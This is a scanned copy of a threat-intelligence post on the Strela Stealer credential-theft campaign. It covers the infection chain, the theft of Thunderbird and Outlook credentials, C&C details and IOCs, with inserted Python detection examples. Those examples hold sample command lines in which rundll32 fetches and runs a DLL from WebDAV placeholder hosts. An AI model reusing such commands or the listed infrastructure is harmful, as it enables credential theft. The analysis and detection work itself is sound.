cyble.com  192.0.78.152  Public Scan (urlscan.io)

URL: https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
Submission: On November 07 via api from IN — Scanned from US

 * Infostealer, Malware

 * October 30, 2024


STRELA STEALER TARGETS CENTRAL AND SOUTHWESTERN EUROPE THROUGH STEALTHY
EXECUTION VIA WEBDAV

Cyble analyzes Strela Stealer’s stealthy phishing campaign targeting Central and
Southwestern Europe, using obfuscated JavaScript and WebDAV to deploy its
payload and steal sensitive credentials.


KEY TAKEAWAYS

 * The recent Strela Stealer phishing campaign, uncovered by Cyble Research and
   Intelligence Labs (CRIL), poses as an invoice notification to trick users
   into engaging with it.
 * This campaign predominantly targets users in Central and Southwestern
   European regions, adjusting its focus based on locale settings to maximize
   its reach within specific demographics.
 * Phishing emails carry ZIP file attachments containing heavily obfuscated
   JavaScript (.js) files, which are designed to evade detection by security
   tools.
 * The JavaScript file conceals a base64-encoded PowerShell command that, when
   executed, launches a malicious payload directly from the WebDAV server
   without saving the file to disk.
 * The payload, Strela Stealer, is embedded within an obfuscated DLL file,
   specifically targeting systems in Germany and Spain.
 * Strela Stealer is programmed to steal sensitive email configuration details,
   such as server information, usernames, and passwords.
 * In addition to stealing credentials, Strela Stealer gathers detailed system
   information, enabling attackers to conduct reconnaissance and potentially
   launch further targeted actions on compromised systems.


EXECUTIVE SUMMARY

Strela Stealer, first identified by DCSO in late 2022, is a type of
information-stealing malware primarily designed to exfiltrate email account
credentials from widely used email clients, including Microsoft Outlook and
Mozilla Thunderbird. This malware initially targeted Spanish-speaking users
through spam email campaigns containing malicious ISO attachments, which
included a .lnk file and a polyglot file. When executed, the .lnk file triggered
the polyglot file, executing both the lure HTML and the Strela Stealer DLL using
“rundll32.exe”.

The Threat Actors (TAs) then evolved their tactics by using spear-phishing
emails with ZIP file attachments, as identified by Palo Alto. When users
downloaded and extracted the archive, a JavaScript file was saved onto their
system. Executing the JavaScript file dropped a Base64-encoded file and a batch
file. The Base64 file was then decoded using the “certutil -f decode” command,
creating a DLL that was executed using “rundll32.exe” with the exported function
“hello.”

In their latest campaign, the TAs are using spear-phishing emails with ZIP file
attachments containing obfuscated JavaScript code intended to run through
WScript. This JavaScript code executes a base64-encoded PowerShell command,
which executes the final malicious DLL from a WebDAV server using “rundll32.exe”
via the exported function “Entry.” By using this method, the malicious DLL file
is not saved on the disk, allowing it to evade detection by security products.




TECHNICAL DETAILS

The Strela Stealer campaign begins with a carefully crafted phishing email
written in German, with a theme designed to resemble an invoice for a recent
product purchase. The email aims to encourage recipients to open the attached
ZIP file RG_175_133572_7063403.zip under the pretense of verifying or processing
a transaction. The figure below shows one of the phishing emails.

Figure 1 – Phishing Email



Inside the ZIP file named “RG_175_133572_7063403.zip,” there is a highly
obfuscated JavaScript file named “1819737872954318698.js.” This JavaScript file
employs advanced obfuscation techniques, using string substitution to generate
and execute its hidden code. When triggered, it runs through Windows Script Host
(wscript), which then initiates a PowerShell command embedded within the script.



The PowerShell command further contains a base64-encoded payload. Once decoded
and executed, this encoded command reaches out to a WebDAV server and executes a
malicious DLL file named “96492217114973.dll” on the target system, allowing
Strela Stealer to embed itself and begin its data-theft operations. The figure
below shows the de-obfuscated JavaScript code.
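The chain described above (WScript launching an encoded PowerShell command, which has rundll32 load the DLL from a WebDAV share through its "Entry" export) is what a host-based detection should key on. The block below is an added example, not code from Cyble or from the campaign: it decodes -EncodedCommand arguments (base64 over a UTF-16LE string) and flags rundll32 command lines that name a UNC- or WebDAV-hosted DLL. The process-creation events, their field names, the host 203.0.113.10 and the PowerShell one-liner are constructed; only the DLL name 96492217114973.dll and the export name come from the write-up.

```python
"""Triage for the WScript -> encoded PowerShell -> rundll32-from-WebDAV chain.

Added example, not Cyble's code or the campaign's. Event field names, the parent
images, the host 203.0.113.10 and the PowerShell one-liner are assumptions; only
the DLL name 96492217114973.dll and the export "Entry" come from the write-up.
"""
import base64
import re

# -EncodedCommand carries base64 over a UTF-16LE string; PowerShell also accepts
# the abbreviations -enc, -ec and -e.
_ENC_RE = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

# rundll32 handed a UNC-hosted DLL: \\host[@port]\share\...\name.dll,Export
_UNC_DLL_RE = re.compile(
    r"\\\\([^\\\s'\"]+)\\(?:[^\s,'\"]*\\)?([^\s,\\'\"]+\.dll)\s*,\s*(\w+)", re.I
)


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand, or None if absent/undecodable."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_unc_dll_load(text: str):
    """Return (host, dll, export) when rundll32 loads a DLL from a UNC path."""
    if "rundll32" not in text.lower():
        return None
    m = _UNC_DLL_RE.search(text)
    return m.groups() if m else None


def is_webdav_path(host: str, text: str) -> bool:
    """The WebClient redirector addresses WebDAV shares as host@port and/or via
    the DavWWWRoot virtual share; neither form appears for ordinary SMB shares."""
    return "@" in host or "davwwwroot" in text.lower()


def triage(events):
    """Flag process-creation events whose command line, directly or after decoding
    -EncodedCommand, runs rundll32 against a remote-share DLL."""
    findings = []
    for ev in events:
        candidates = [(ev["cmdline"], False)]
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded:
            candidates.append((decoded, True))
        for text, via_encoded in candidates:
            hit = find_unc_dll_load(text)
            if hit:
                host, dll, export = hit
                findings.append({
                    "image": ev["image"], "parent": ev["parent"],
                    "host": host, "dll": dll, "export": export,
                    "webdav": is_webdav_path(host, text),
                    "via_encoded_command": via_encoded,
                })
                break
    return findings


# Constructed sample events (Sysmon Event ID 1-style fields, simplified).
_PS_PLAINTEXT = (r"Start-Process rundll32.exe -ArgumentList "
                 r"'\\203.0.113.10@80\DavWWWRoot\96492217114973.dll,Entry'")
_PS_B64 = base64.b64encode(_PS_PLAINTEXT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"image": "powershell.exe", "parent": "wscript.exe",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {_PS_B64}"},
    {"image": "rundll32.exe", "parent": "powershell.exe",
     "cmdline": r"rundll32.exe \\203.0.113.10@80\DavWWWRoot\96492217114973.dll,Entry"},
    {"image": "rundll32.exe", "parent": "explorer.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe -Command Get-Date"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run as a script it prints two findings: the PowerShell event (caught only after decoding) and the rundll32 event itself, both marked as WebDAV because of the host@port and DavWWWRoot forms. The benign rundll32 and PowerShell events are not reported. The same two checks, decoding -EncodedCommand and matching a UNC DLL path in rundll32 command lines, map directly onto process-creation telemetry from Sysmon or an EDR.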

Figure 2 – JavaScript File



The DLL file acts as a loader for the main payload and includes only a single
export function named “Entry”. The DLL includes numerous conditional jump
instructions, making analysis more challenging and potentially causing the
disassembler to crash. Furthermore, several functionalities may not work
properly in the debugger with default settings due to the extensive branching
and conditions. The figure below shows the IDA graph view.

Figure 3 – IDA graph view



Upon execution, the DLL accesses a hardcoded key within its “.data” section, as
shown in Figure 5. This key is used to decrypt additional data stored in the
same section, ultimately extracting the main executable payload.

Figure 4 – Key present in DLL file



The code below demonstrates the use of XOR and other arithmetic operations for
decryption.

Figure 5 – Decrypting the MZ header



The image below displays the decrypted MZ content.

Figure 6 – MZ Header



The resulting MZ file runs directly from the “rundll32.exe” process. For
analysis, we extracted this payload and examined it separately, identifying it
as Strela Stealer, a malware active since April 2022.

Here we compared the previous versions of Strela Stealer with the new one.

Campaign Identified in 2022 | Campaign Identified in March 2024 | Latest Campaign
No code obfuscation | Employed control flow obfuscation | Employed control flow obfuscation
No decryption of PE file from DLL file | Decrypts a memory mapped PE file | Decrypts a memory mapped PE file
strela, server.php, key4.db, and login.json strings present in the decrypted PE file | strela, server.php, key4.db, and login.json strings present in the decrypted PE file | Strela string is removed
PDB path is present | No PDB path | No PDB path
Export function name: Strela | Export function name: hello | Export function name: Entry
Drops payload from ISO | Drops payload from ZIP | Executes payload from WebDAV Server

While the Strela stealer is running, it hides its window by calling the
“ShowWindow” Win32 API with the “SW_HIDE” parameter for the current process. It
then creates a thread to display a fake error message, as shown below.

Figure 7 – Fake error message



Next, the stealer obtains the locale settings of the victim’s machine by calling
the GetKeyboardLayout API and comparing the result against the hardcoded
language identifiers listed below.

 * 0407 – German (Germany)
 * 0C0A – Spanish (Spain)
 * 042D – Basque (Spain)

If any of these language identifiers match, the stealer continues its execution;
if not, it stops. This behavior indicates that the malware specifically targets
regions within Germany and Spain.

Figure 8 – Locale Check




TARGETING THUNDERBIRD

The malware scans for Thunderbird profiles and collects “logins.json” and
“key4.db” files from all profiles found on the system. These files contain
sensitive information, including usernames, passwords, and other email
configuration details. Once obtained, the data within these files is encrypted
using a custom encryption method with a hardcoded key,
“96be98b2-8a00-410d-87da-2482cc8b7793”, and then sent to the TA’s command and
control (C&C) server at “94.159.113.48” via a POST request. Following the data
transmission, the malware expects the response “ANTIROK” from the C&C server and
continues to resend the encrypted data using the same encryption method until
this response is received.

Figure 9 – Targeting Thunderbird profiles




TARGETING OUTLOOK

To steal Outlook information, the malware examines specific registry keys to
retrieve IMAP server details, usernames, and passwords, which are typically
stored in encrypted form. It accesses the following registry paths:

 * Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
 * Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
 * SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\

Using the “CryptUnprotectData” Win32 API, it decrypts these details into plain
text. After decryption, the malware applies custom encryption using the same
hardcoded key as in the Thunderbird case and an XOR operation before sending the
encrypted data to the threat actor’s command-and-control (C&C) server.
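Because the three profile keys above are read by a process that is not Outlook, a read-audit on them is a precise detection point. The block below is an added example, not Cyble's code: it normalizes registry paths as they appear in audit events (hive prefix, per-user SID, case) and flags reads of the profile keys by any image other than Outlook. It assumes an audit source that records registry reads per process (object-access auditing with a SACL on the keys; Sysmon's registry events record key and value writes, not reads). The event dicts, the process paths, the SID and the "constructed_subkey" leaf are constructed; the key paths themselves come from the write-up.

```python
"""Matcher for reads of the Outlook profile registry keys named above.

Added example, not Cyble's code. Assumes an audit source that records registry
reads per process (object-access auditing with a SACL on the keys). The event
dicts, process paths, SID and 'constructed_subkey' leaf are constructed; the
three key paths come from the write-up.
"""
import re

OUTLOOK_PROFILE_KEYS = (
    r"Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676",
    r"Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
    r"SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676",
)

# Processes expected to read these keys (assumption; tune per environment).
EXPECTED_IMAGES = {"outlook.exe"}

# Hive prefixes as written by different audit sources, followed by a separator.
_HIVE_RE = re.compile(
    r"^(?:HKEY_[A-Z_]+|HK(?:CU|LM|U|CR|CC)|REGISTRY\\(?:USER|MACHINE))\\", re.I
)
# Per-user SID that HKEY_USERS / REGISTRY\USER paths carry before the key.
_SID_RE = re.compile(r"^S-1-[\d-]+\\", re.I)


def normalize_key(path: str) -> str:
    """Strip hive prefix, per-user SID and surrounding separators, then lowercase,
    so HKCU-, HKEY_USERS-SID- and REGISTRY-USER-prefixed spellings compare equal."""
    p = path.strip().strip("\\")
    p = _HIVE_RE.sub("", p)
    p = _SID_RE.sub("", p)
    return p.rstrip("\\").lower()


_TARGETS = tuple(normalize_key(k) for k in OUTLOOK_PROFILE_KEYS)


def touches_outlook_profile(target: str) -> bool:
    """True if target is one of the profile keys or any subkey/value beneath it."""
    n = normalize_key(target)
    return any(n == t or n.startswith(t + "\\") for t in _TARGETS)


def flag_profile_reads(events):
    """Return events where a process other than Outlook reads a profile key."""
    flagged = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        if touches_outlook_profile(ev["TargetObject"]) and image not in EXPECTED_IMAGES:
            flagged.append(ev)
    return flagged


SAMPLE_EVENTS = [  # constructed
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKEY_USERS\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\constructed_subkey"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\constructed_subkey"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for ev in flag_profile_reads(SAMPLE_EVENTS):
        print("suspicious profile read:", ev["Image"], "->", ev["TargetObject"])
```

Only the rundll32 read of the Windows Messaging Subsystem profile key is reported; Outlook's own read of its Office 16.0 profile key is expected, and the Run key is outside the watched paths. The normalization is the part worth keeping: the same key is spelled three different ways across HKCU, HKEY_USERS with a SID, and kernel-style REGISTRY paths, and a naive string match misses two of them.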


GATHERING SYSTEM INFORMATION

Continuing its data gathering, the malware executes the “systeminfo” command,
saving the output as a text file within the Temp directory. This file is then
exfiltrated to the TA’s C&C server using the previously mentioned encryption
technique.

Figure 10 – Gathering systeminfo



In some cases, if the response “ANTIROK” is not received from the C&C server,
the stealer re-applies the same encryption routine to the buffer that is already
encrypted rather than to the original data. Because the routine is XOR-based, a
second pass with the same key undoes the first, so the retry transmits the
actual data without encryption, as illustrated in the figure below.
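The retry behaviour above, and the cleartext it puts on the wire, follow from the XOR operation the routine relies on (this example also serves the Thunderbird section, which names the hardcoded key). The block below is an added example, not Cyble's code or the stealer's: it uses a repeating-key XOR as an assumed stand-in for the custom routine (the write-up names the key but not the full scheme), shows that applying it a second time with the same key restores the plaintext, and runs a simple cleartext check of the kind a network sensor could apply to captured POST bodies. It generalizes the observation slightly: any odd number of re-encryptions leaves the data in the clear. The sample record and the field-name markers are constructed.

```python
"""Why a second pass of an XOR-based routine leaks the data it was meant to protect.

Added example, not Cyble's code or the stealer's. Repeating-key XOR is an assumed
stand-in for the custom routine; the key is the one named in the write-up, and
the sample record and field-name markers are constructed.
"""
KEY = b"96be98b2-8a00-410d-87da-2482cc8b7793"  # hardcoded key from the write-up


def xor_with_key(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR (assumption). XOR is an involution: applying it twice
    with the same key returns the original bytes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def simulate_retries(record: bytes, retries: int) -> bytes:
    """Model the retry behaviour: each resend re-applies the routine to the buffer
    that was already transformed instead of to the original record, so an odd
    number of retries puts cleartext on the wire."""
    body = xor_with_key(record)          # first transmission
    for _ in range(retries):
        body = xor_with_key(body)        # "re-encrypt" the encrypted buffer
    return body


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or common whitespace."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


# Field names a defender would expect to see if stolen mail-client data is sent
# in the clear (constructed list; extend from your own captures).
PLAINTEXT_MARKERS = (b"logins.json", b"key4.db", b"imap", b"host name:")


def looks_like_leaked_plaintext(body: bytes, threshold: float = 0.95) -> bool:
    """A POST body that is almost entirely printable, or that carries known field
    names, is not the output of the XOR routine but the data itself."""
    lowered = body.lower()
    return (printable_ratio(body) >= threshold
            or any(m in lowered for m in PLAINTEXT_MARKERS))


# Constructed sample "exfiltration record" (not real victim data).
SAMPLE_RECORD = b"file=logins.json\r\nhostname=imap.example.test\r\nuser=alice\r\n"


def classify_transmissions(record: bytes = SAMPLE_RECORD, max_retries: int = 3):
    """Return, per retry count, whether the transmitted body leaks cleartext."""
    return {n: looks_like_leaked_plaintext(simulate_retries(record, n))
            for n in range(max_retries + 1)}


if __name__ == "__main__":
    for n, leaked in classify_transmissions().items():
        print(f"retry {n}: {'CLEARTEXT' if leaked else 'encrypted'}")
```

The first transmission and every even-numbered retry are opaque; the first retry and every odd-numbered one carry the record verbatim. For a defender this means the C&C POST bodies are worth inspecting for mail-client field names rather than being written off as encrypted, and that blocking or sinkholing the server (so "ANTIROK" never arrives) is exactly the condition that triggers the cleartext resend.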

Figure 11 – Data Exfiltration



In its final steps, the malware utilizes a COM object to navigate through the
system’s “SpecialFolders” paths, collecting filenames from each directory. This
data is compiled into a single output and sent to the attacker’s C2 server. By
gathering information on files stored in sensitive locations, the malware
enables the TA to perform reconnaissance, potentially planning further data
exfiltration or deploying additional malicious activities based on the obtained
directory structure.


CONCLUSION

The recent iterations of the Strela Stealer campaign reveal a notable
advancement in malware delivery techniques, highlighting increased
sophistication and stealth. By employing spear-phishing emails that contain ZIP
file attachments, the malware successfully circumvents conventional security
defenses. The use of heavily obfuscated JavaScript, along with base64-encoded
PowerShell commands, significantly complicates detection and response efforts.
Additionally, executing the DLL file directly from the WebDAV server without
saving it to disk effectively bypasses security mechanisms, enabling
unauthorized access to sensitive information. This evolution underscores the
importance of proactive cybersecurity measures to counter such advanced threats.


CYBLE’S THREAT HUNTING PACKAGES

At Cyble, we understand the evolving landscape of cyber threats and the need for
robust security measures. Our Threat Hunting Packages are specifically designed
to detect suspicious remote WebDAV share access and file execution activities,
such as those employed by the Strela Stealer malware.

In addition to our sophisticated detection capabilities, our Threat Hunting
Packages include custom YARA rules tailored to identify signatures associated
with Strela Stealer. These rules enhance an organization’s security posture by
enabling quick detection of known threats, ensuring that systems remain
protected against sophisticated malware tactics.

For further details on this threat and several others being constantly analyzed
by Cyble Research and Intelligence Labs, schedule a demo today.


RECOMMENDATIONS

 * Conduct regular training sessions to educate employees about phishing
   tactics, including recognizing suspicious emails and attachments.
 * Deploy robust endpoint protection solutions that can detect and respond to
   malicious activity, including obfuscated scripts and unauthorized file
   executions.
 * Implement strict access controls on WebDAV servers, ensuring only authorized
   users have access. Disable WebDAV if it is not required for business
   operations to minimize potential attack vectors.
 * Limit the execution of PowerShell scripts and other scripting languages on
   endpoints unless necessary for business operations.
 * Develop and regularly update an incident response plan that includes specific
   procedures for handling phishing attacks and malware infections.
 * Implement multi-factor authentication for accessing sensitive systems and
   accounts, adding an additional layer of security against credential theft.
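The detection described earlier on this page (suspicious remote WebDAV share access and file execution, a script host launching base64-encoded PowerShell, and a DLL run straight from a WebDAV path) can be expressed as a small set of checks over process-creation telemetry. The Python below is an added example, not Cyble's threat hunting package or its YARA rules. It assumes Sysmon-style process-creation fields (parent image, image, command line), assumes the Windows WebDAV redirector path syntax (`\\host@SSL\DavWWWRoot\...`), and uses a rundll32 loader command and the host name `webdav-host.invalid` purely as constructed sample data; the page does not name the loader the malware uses.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List

# WebDAV UNC path as the Windows WebDAV redirector writes it, e.g.
# \\host\DavWWWRoot\x.dll or \\host@SSL@443\DavWWWRoot\x.dll (assumed syntax).
WEBDAV_UNC = re.compile(
    r"\\\\[\w.\-]+(?:@ssl)?(?:@\d+)?\\davwwwroot\\", re.IGNORECASE)
# powershell -EncodedCommand and its accepted abbreviations, then a base64 blob.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record: parent image, image, command line."""
    parent: str
    image: str
    cmdline: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def encode_powershell(command: str) -> str:
    """-EncodedCommand takes the base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str):
    """Reverse of encode_powershell; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: ProcessEvent) -> List[str]:
    """Return the names of every detection the event triggers (empty if clean)."""
    findings = []
    image, parent = _basename(event.image), _basename(event.parent)
    # Stage 1: obfuscated JavaScript under wscript/cscript launching PowerShell.
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        findings.append("script-host-spawned-powershell")
    # Stage 2: base64-encoded PowerShell; decode it and look for a WebDAV path.
    if image == "powershell.exe":
        m = ENCODED_FLAG.search(event.cmdline)
        if m:
            findings.append("encoded-powershell")
            decoded = decode_powershell(m.group(1))
            if decoded and WEBDAV_UNC.search(decoded):
                findings.append("webdav-path-in-decoded-command")
    # Stage 3: a DLL loader given a WebDAV UNC path instead of a local file.
    if image in DLL_LOADERS and WEBDAV_UNC.search(event.cmdline):
        findings.append("dll-loaded-from-webdav")
    return findings


def run_detections(events: List[ProcessEvent]) -> Dict[int, List[str]]:
    return {i: classify(e) for i, e in enumerate(events)}


# Constructed sample events (not captured telemetry); host name is a placeholder.
_STAGE2 = r"rundll32.exe \\webdav-host.invalid@SSL\DavWWWRoot\share\payload.dll,Entry"
SAMPLE_EVENTS = [
    ProcessEvent(
        parent=r"C:\Windows\System32\wscript.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline="powershell.exe -nop -w hidden -EncodedCommand "
                + encode_powershell(_STAGE2)),
    ProcessEvent(
        parent=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        image=r"C:\Windows\System32\rundll32.exe",
        cmdline=_STAGE2),
    ProcessEvent(  # benign admin script: must produce no findings
        parent=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for idx, hits in run_detections(SAMPLE_EVENTS).items():
        print(idx, hits or "clean")
```

The three checks map onto the recommendations above: the first two are what endpoint protection should surface when PowerShell is launched by a script host or with an encoded command, and the third is the signal that remains useful even where WebDAV cannot be disabled outright, since a DLL loader pointed at a `DavWWWRoot` path has no routine administrative use. Decoding the encoded command before matching matters because the WebDAV path never appears in the outer command line.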


MITRE ATT&CK® TECHNIQUES

Tactic / Technique
  Procedure

Initial Access (TA0001) / Phishing (T1566)
  The campaign starts with spear-phishing emails containing ZIP file
  attachments.

Execution (TA0002) / User Execution (T1203)
  The obfuscated JavaScript code executes via WScript, running PowerShell
  commands.

Execution (TA0002) / Command and Scripting Interpreter (T1059)
  PowerShell commands are triggered to execute the final payload.

Credential Access (TA0006) / Credential Dumping (T1003)
  The malware retrieves usernames and passwords from Thunderbird and Outlook
  profiles.

Discovery (TA0007) / System Information Discovery (T1082)
  Executes systeminfo to gather system details and saves the output as a text
  file.

Discovery (TA0007) / File and Directory Discovery (T1083)
  Collects filenames from system directories using COM objects.

Command and Control (TA0011) / Application Layer Protocol (T1071)
  The encrypted data is sent to the C&C server via HTTP POST requests.

Exfiltration (TA0010) / Exfiltration Over Command and Control Channel (T1041)
  The stolen data, including login credentials, is exfiltrated to the TA’s
  server.


INDICATORS OF COMPROMISE

Indicators                                                        Indicator Type  Description
13d96ed827887f6c31d907a5ee29441e2afd95be683e51e874cf5ad8207c1a98  SHA256          Strela Stealer
1970d38e7fa45a46e792372a19d890541c87d1007ddedd53858b6df6728d72ff  SHA256          Strela Stealer
dbd301f710d45acdd639cda5cd47a5453b9abb8a361ed250bfc47de70318fec6  SHA256          Strela Stealer
13531bd403e5f8f607bf16144c38ffd94004eafa8e6a098628b915de07ba432b  SHA256          Strela Stealer
080caffde331496a46e8cb35acd107ed113046b46310747a2dd15a62efab23b5  SHA256          Strela Stealer
bd26724bdc8c5d9cb65d361231048725fbc31072d4c457c23531bc4333460011  SHA256          Strela Stealer
77836c0b18bbfef70fd04ba674ea045bf109851efe76ae9bcc55c2dcd08cc3c5  SHA256          Strela Stealer
03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311  SHA256          Strela Stealer
cd39bec789b79d9ea6a642ab2ddc93121f5596de21e3b13c335ceaddb83f2083  SHA256          Strela Stealer
b9ae263904d3a5fb8471a0f8ab95fcbb224f632e6185e3a110e8d5aed9785420  SHA256          Strela Stealer
vaultdocker[.]com                                                 Domain          Malicious
cloudslimit[.]com                                                 Domain          Malicious
dailywebstats[.]com                                               Domain          Malicious
endpointexperiment[.]com                                          Domain          Malicious
apitestlabs[.]com                                                 Domain          Malicious
94[.]159[.]113[.]48                                               IP              Malicious


